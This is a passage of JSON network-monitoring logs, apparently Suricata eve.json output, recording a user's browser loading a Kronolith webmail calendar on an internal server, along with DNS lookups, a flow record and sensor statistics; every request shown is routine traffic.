Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.467174+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:22:32.468392+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.467975+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.468862+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":12}} {"timestamp":"2020-02-29T00:22:32.470541+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.471106+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:22:32.497612+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.497978+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:22:32.509315+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:22:32.509535+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:22:32.509359+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:22:32.557018+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.582795+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.740787+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.753213+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12947,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.763804+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":13}} {"timestamp":"2020-02-29T00:22:32.764123+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:22:32.786769+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.888088+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62035,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:33.000123+0000","event_type":"stats","stats":{"uptime":15005,"capture":{"kernel_packets":139386,"kernel_drops":0},"decoder":{"pkts":139404,"bytes":95696369,"invalid":194,"ipv4":137843,"ipv6":10,"ethernet":139404,"raw":0,"null":0,"sll":0,"tcp":132311,"udp":5323,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2867,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2883,"synack":2874,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1886,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2435,"failed_udp":116},"tx":{"http":4842,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2517}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":215062,"memcap":0}}} {"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":5}} {"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044}} {"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":6}} {"timestamp":"2020-02-29T00:22:34.000162+0000","flow_id":202995961277195,"event_type":"flow","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":17,"bytes_toserver":2308,"bytes_toclient":12401,"start":"2020-02-29T00:19:53.109323+0000","end":"2020-02-29T00:21:32.815837+0000","age":99,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:37.471121+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52962,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472111+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52966,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472155+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":1}} {"timestamp":"2020-02-29T00:22:37.766816+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":14}} {"timestamp":"2020-02-29T00:22:38.036551+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":5}} {"timestamp":"2020-02-29T00:22:38.041842+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":2986,"tx_id":6}} {"timestamp":"2020-02-29T00:22:40.000200+0000","event_type":"stats","stats":{"uptime":15012,"capture":{"kernel_packets":139739,"kernel_drops":0},"decoder":{"pkts":139744,"bytes":95945702,"invalid":194,"ipv4":138181,"ipv6":10,"ethernet":139744,"raw":0,"null":0,"sll":0,"tcp":132642,"udp":5330,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2872,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2888,"synack":2879,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1891,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2438,"failed_udp":116},"tx":{"http":4872,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2520}},"flow_mgr":{"closed_pruned":2837,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:41.398092+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54228,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24532,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 